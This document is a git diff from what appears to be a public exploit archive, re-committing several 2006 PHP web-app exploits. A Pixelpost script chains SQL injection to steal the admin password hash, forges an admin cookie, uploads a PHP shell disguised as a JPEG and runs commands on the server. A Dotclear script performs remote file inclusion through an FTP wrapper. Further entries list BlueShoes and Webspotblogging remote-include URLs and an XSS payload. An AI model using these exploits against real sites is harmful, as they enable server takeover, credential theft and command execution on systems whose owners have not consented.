- }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
- global $proxy, $host, $port, $html, $proxy_regex;
- if ($proxy=='') {
- $ock=fsockopen(gethostbyname($host),$port);
- if (!$ock) {
- echo 'No response from '.$host.':'.$port; die;
- }
- }
- else {
- $c = preg_match($proxy_regex,$proxy);
- if (!$c) {
- echo 'Not a valid proxy...';die;
- }
- $parts=explode(':',$proxy);
- echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
- $ock=fsockopen($parts[0],$parts[1]);
- if (!$ock) {
- echo 'No response from proxy...';die;
- }
- }
- fputs($ock,$packet);
- if ($proxy=='') {
- $html='';
- while (!feof($ock)) {
- $html.=fgets($ock);
- }
- }
- else {
- $html='';
- while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
- $html.=fread($ock,1);
- }
- }
- fclose($ock);
- #debug
- #echo "\r\n".$html;
-
-}
-
-function is_hash($hash)
-{
- if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
- else {return false;}
-}
-
-function make_seed()
-{
- list($usec, $sec) = explode(' ', microtime());
- return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$your_ip=$argv[3];
-$cmd="";$port=80;$proxy="";$table_prefix="pixelpost_";
-
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P") and ($temp<>"-T"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
- $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
- $proxy=str_replace("-P","",$argv[$i]);
-}
-if ($temp=="-T")
-{
- $table_prefix=str_replace("-T","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else
-{
-$p='http://'.$host.':'.$port.$path;
-$temp=explode(":",$proxy);
-$your_ip=$temp[0];
-}
-
-echo "Trying sql injection in 'category' argument...\r\n";
-$sql="'/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$hash=trim($temp2[0]);
-if (is_hash($hash)){
-echo "admin md5 password hash -> ".$hash."\r\n";
-$sql="'/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$admin=trim($temp2[0]);
-echo " \" username -> ".$admin."\r\n";
-}
-else { echo "Trying with 'archivedate' argument...\r\n";
-$sql="')/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$hash=trim($temp2[0]);
-if (is_hash($hash)){
- echo "admin md5 password hash -> ".$hash."\r\n";
- }
-else {die ("Exploit failed...magic_quotes_gpc on here or code patched");}
-
-$sql="')/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$admin=trim($temp2[0]);
-echo " \" username -> ".$admin."\r\n";
-}
-
-$cookie="pp_user=".$admin."; pp_password=".sha1($hash.$your_ip).";";
-$packet="GET ".$p."admin/index.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$cookie="";
-for ($i=1; $i<=count($temp); $i++)
-{
-$temp2=explode(" ",$temp[$i]);
-$cookie.=" ".$temp2[0];
-}
-echo "admin cookie ->".$cookie."\r\n";
-
-$shell=
-'';
-srand(make_seed());
-$anumber = rand(1,99999);
-$my_file="suntzu".$anumber.".php";
-$data='
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="headline"
-
-Under Costruction... - Admin.
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="category[]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="body"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="autodate"
-
-3
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_year"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_month"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_day"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_hour"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_minute"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="userfile"; filename="'.$my_file.'"
-Content-Type: image/jpeg
-
-'.$shell.'
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="submit"
-
-Upload
------------------------------7d6318101b00a2--
-';
-
-$packet="POST ".$p."admin/index.php?x=save HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-$packet="GET ".$p."index.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("img src=\"",$html);
-$temp2=explode(" ",$temp[1]);
-for ($i=1; $i<=count($temp); $i++)
-{
-$temp2=explode("\"",$temp[$i]);
-if (eregi($my_file,$temp2[0]))
- {
- $my_path=$temp2[0];
- echo "shell -> ".$my_path."\r\n";
- break;
- }
-}
-
-$packet="GET ".$p.$my_path." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"*deli*"))
-{
- $temp=explode("*deli*",$html);
- die("Exploit succeeded...\r\n".$temp[1]);
-}
-else
-{
- echo "Failed to launch commands...";
-}
-?>
-
-# milw0rm.com [2006-06-03]
+#!/usr/bin/php -q -d short_open_tag=on
+alert(document.cookie)
+ http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=
+ http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=
+
+ iv) another xss, without to be logged in:
+ http://[target]/[path]/admin/index.php?loginmessage=">
+
+ */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+ $result='';$exa='';$cont=0;
+ for ($i=0; $i<=strlen($string)-1; $i++)
+ {
+ if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+ {$result.=" .";}
+ else
+ {$result.=" ".$string[$i];}
+ if (strlen(dechex(ord($string[$i])))==2)
+ {$exa.=" ".dechex(ord($string[$i]));}
+ else
+ {$exa.=" 0".dechex(ord($string[$i]));}
+ $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+ }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+ global $proxy, $host, $port, $html, $proxy_regex;
+ if ($proxy=='') {
+ $ock=fsockopen(gethostbyname($host),$port);
+ if (!$ock) {
+ echo 'No response from '.$host.':'.$port; die;
+ }
+ }
+ else {
+ $c = preg_match($proxy_regex,$proxy);
+ if (!$c) {
+ echo 'Not a valid proxy...';die;
+ }
+ $parts=explode(':',$proxy);
+ echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+ $ock=fsockopen($parts[0],$parts[1]);
+ if (!$ock) {
+ echo 'No response from proxy...';die;
+ }
+ }
+ fputs($ock,$packet);
+ if ($proxy=='') {
+ $html='';
+ while (!feof($ock)) {
+ $html.=fgets($ock);
+ }
+ }
+ else {
+ $html='';
+ while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+ $html.=fread($ock,1);
+ }
+ }
+ fclose($ock);
+ #debug
+ #echo "\r\n".$html;
+
+}
+
+function is_hash($hash)
+{
+ if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
+ else {return false;}
+}
+
+function make_seed()
+{
+ list($usec, $sec) = explode(' ', microtime());
+ return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$your_ip=$argv[3];
+$cmd="";$port=80;$proxy="";$table_prefix="pixelpost_";
+
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P") and ($temp<>"-T"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+ $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+ $proxy=str_replace("-P","",$argv[$i]);
+}
+if ($temp=="-T")
+{
+ $table_prefix=str_replace("-T","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else
+{
+$p='http://'.$host.':'.$port.$path;
+$temp=explode(":",$proxy);
+$your_ip=$temp[0];
+}
+
+echo "Trying sql injection in 'category' argument...\r\n";
+$sql="'/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$hash=trim($temp2[0]);
+if (is_hash($hash)){
+echo "admin md5 password hash -> ".$hash."\r\n";
+$sql="'/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$admin=trim($temp2[0]);
+echo " \" username -> ".$admin."\r\n";
+}
+else { echo "Trying with 'archivedate' argument...\r\n";
+$sql="')/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$hash=trim($temp2[0]);
+if (is_hash($hash)){
+ echo "admin md5 password hash -> ".$hash."\r\n";
+ }
+else {die ("Exploit failed...magic_quotes_gpc on here or code patched");}
+
+$sql="')/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$admin=trim($temp2[0]);
+echo " \" username -> ".$admin."\r\n";
+}
+
+$cookie="pp_user=".$admin."; pp_password=".sha1($hash.$your_ip).";";
+$packet="GET ".$p."admin/index.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$cookie="";
+for ($i=1; $i<=count($temp); $i++)
+{
+$temp2=explode(" ",$temp[$i]);
+$cookie.=" ".$temp2[0];
+}
+echo "admin cookie ->".$cookie."\r\n";
+
+$shell=
+'';
+srand(make_seed());
+$anumber = rand(1,99999);
+$my_file="suntzu".$anumber.".php";
+$data='
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="headline"
+
+Under Costruction... - Admin.
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="category[]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="body"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="autodate"
+
+3
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_year"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_month"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_day"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_hour"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_minute"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="userfile"; filename="'.$my_file.'"
+Content-Type: image/jpeg
+
+'.$shell.'
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------7d6318101b00a2--
+';
+
+$packet="POST ".$p."admin/index.php?x=save HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+$packet="GET ".$p."index.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("img src=\"",$html);
+$temp2=explode(" ",$temp[1]);
+for ($i=1; $i<=count($temp); $i++)
+{
+$temp2=explode("\"",$temp[$i]);
+if (eregi($my_file,$temp2[0]))
+ {
+ $my_path=$temp2[0];
+ echo "shell -> ".$my_path."\r\n";
+ break;
+ }
+}
+
+$packet="GET ".$p.$my_path." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"*deli*"))
+{
+ $temp=explode("*deli*",$html);
+ die("Exploit succeeded...\r\n".$temp[1]);
+}
+else
+{
+ echo "Failed to launch commands...";
+}
+?>
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1869.php b/platforms/php/webapps/1869.php
index 5115d4be8..206f198a2 100755
--- a/platforms/php/webapps/1869.php
+++ b/platforms/php/webapps/1869.php
@@ -1,189 +1,189 @@ -#!/usr/bin/php -q -d short_open_tag=on -\r\n"; -die; -} -/* - software site: http://www.dotclear.net/ - - vulnerable code in layout/prepend.php near lines 78-104: - -... -# Variable de conf -$theme_path = $blog_dc_path.'/themes/'; -$theme_uri = dc_app_url.'/themes/'; -$img_path = dc_img_url; - -# Définition du thème et de la langue -$__theme = dc_theme; -$__lang = dc_default_lang; - -# Ajout des functions.php des plugins -$objPlugins = new plugins(dirname(__FILE__).'/../'.DC_ECRIRE.'/tools/'); -foreach ($objPlugins->getFunctions() as $pfunc) { - require_once $pfunc; -} - -# Définition du template -if (!is_dir($theme_path.$__theme)) { - header('Content-type: text/plain'); - echo 'Le thème '.$__theme.' n\'existe pas'; - exit; -} - -if (file_exists($theme_path.$__theme.'/template.php')) { - $dc_template_file = $theme_path.$__theme.'/template.php'; -} else { - $dc_template_file = $theme_path.'default/template.php'; -} -echo $dc_template_file; -# Prepend du template s'il existe -if (file_exists(dirname($dc_template_file).'/prepend.php')) { - require dirname($dc_template_file).'/prepend.php'; -} -... 
- - -$blog_dc_path var is not sanitized before to be used to include files, -on PHP5, because is_dir() and file_exists() funcs support ftp wrappers, -you can include an arbitrary prepend.php file in a themes/default/ folder -from a remote resource, poc: - -http://[target]/[path_to_dotclear]/layout/prepend.php?blog_dc_path=ftp://username:password@somesite.com&cmd=ls%20-la - - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$loc=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$loc=urlencode($loc); -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$packet="GET ".$path."layout/prepend.php HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Cookie: blog_dc_path=".$loc."; cmd=".$cmd.";\r\n"; //through cookies, log this -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (strstr($html,"*deli*")) -{echo "exploit succeeded...\r\n"; - $temp=explode("*deli*",$html); - die($temp[1]); -} -else -{echo "exploit failed...\r\n"; - //debug - echo $html; -} -?> - -# milw0rm.com [2006-06-03] +#!/usr/bin/php -q -d short_open_tag=on +\r\n"; +die; +} +/* + software site: http://www.dotclear.net/ + + vulnerable code in layout/prepend.php near lines 78-104: + +... 
+# Variable de conf +$theme_path = $blog_dc_path.'/themes/'; +$theme_uri = dc_app_url.'/themes/'; +$img_path = dc_img_url; + +# Définition du thème et de la langue +$__theme = dc_theme; +$__lang = dc_default_lang; + +# Ajout des functions.php des plugins +$objPlugins = new plugins(dirname(__FILE__).'/../'.DC_ECRIRE.'/tools/'); +foreach ($objPlugins->getFunctions() as $pfunc) { + require_once $pfunc; +} + +# Définition du template +if (!is_dir($theme_path.$__theme)) { + header('Content-type: text/plain'); + echo 'Le thème '.$__theme.' n\'existe pas'; + exit; +} + +if (file_exists($theme_path.$__theme.'/template.php')) { + $dc_template_file = $theme_path.$__theme.'/template.php'; +} else { + $dc_template_file = $theme_path.'default/template.php'; +} +echo $dc_template_file; +# Prepend du template s'il existe +if (file_exists(dirname($dc_template_file).'/prepend.php')) { + require dirname($dc_template_file).'/prepend.php'; +} +... + + +$blog_dc_path var is not sanitized before to be used to include files, +on PHP5, because is_dir() and file_exists() funcs support ftp wrappers, +you can include an arbitrary prepend.php file in a themes/default/ folder +from a remote resource, poc: + +http://[target]/[path_to_dotclear]/layout/prepend.php?blog_dc_path=ftp://username:password@somesite.com&cmd=ls%20-la + + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, 
$host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$loc=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$loc=urlencode($loc); +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$packet="GET ".$path."layout/prepend.php HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Cookie: blog_dc_path=".$loc."; cmd=".$cmd.";\r\n"; //through cookies, log this +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (strstr($html,"*deli*")) +{echo "exploit succeeded...\r\n"; + $temp=explode("*deli*",$html); + die($temp[1]); +} +else +{echo "exploit failed...\r\n"; + //debug + echo $html; +} +?> + +# milw0rm.com [2006-06-03] diff --git a/platforms/php/webapps/1870.txt b/platforms/php/webapps/1870.txt index ad7189eaa..06574cfca 100755 --- a/platforms/php/webapps/1870.txt 
+++ b/platforms/php/webapps/1870.txt 
@@ -1,39 +1,39 @@
-$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
-$$
-$$ BlueShoes Framework 4.6 <= Remote File Include Vulnerability
-$$ Script site: http://www.blueshoes.org/
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$ Find by: Kacper (a.k.a Rahim)
-$$
-$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
-$$ Adam, DeathSpeed, Drzewko, pepi
-$$
-$$ Specjal greetz: DragonHeart ;-)
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-
-Expl:
-
-http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]
-
-#Pozdro dla wszystkich ;-)
-
-# milw0rm.com [2006-06-03]
+$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
+$$
+$$ BlueShoes Framework 4.6 <= Remote File Include Vulnerability
+$$ Script site: http://www.blueshoes.org/
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$ Find by: Kacper (a.k.a Rahim)
+$$
+$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
+$$ Adam, DeathSpeed, Drzewko, pepi
+$$
+$$ Specjal greetz: DragonHeart ;-)
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+Expl:
+
+http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]
+
+#Pozdro dla wszystkich ;-)
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1871.txt b/platforms/php/webapps/1871.txt
index 221bff77f..4f980c7f3 100755
--- a/platforms/php/webapps/1871.txt
+++ b/platforms/php/webapps/1871.txt
@@ -1,46 +1,46 @@
-$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
-$$
-$$ Webspotblogging 3.0.1 (path) <= Remote File Include Vulnerability
-$$ Script site: http://blogging.webspot.co.uk/
-$$ dork: Powered by WebspotBlogging
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$ Find by: Kacper (a.k.a Rahim)
-$$
-$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
-$$ Adam, DeathSpeed, Drzewko, pepi
-$$
-$$ Specjal greetz: DragonHeart ;-)
-$$
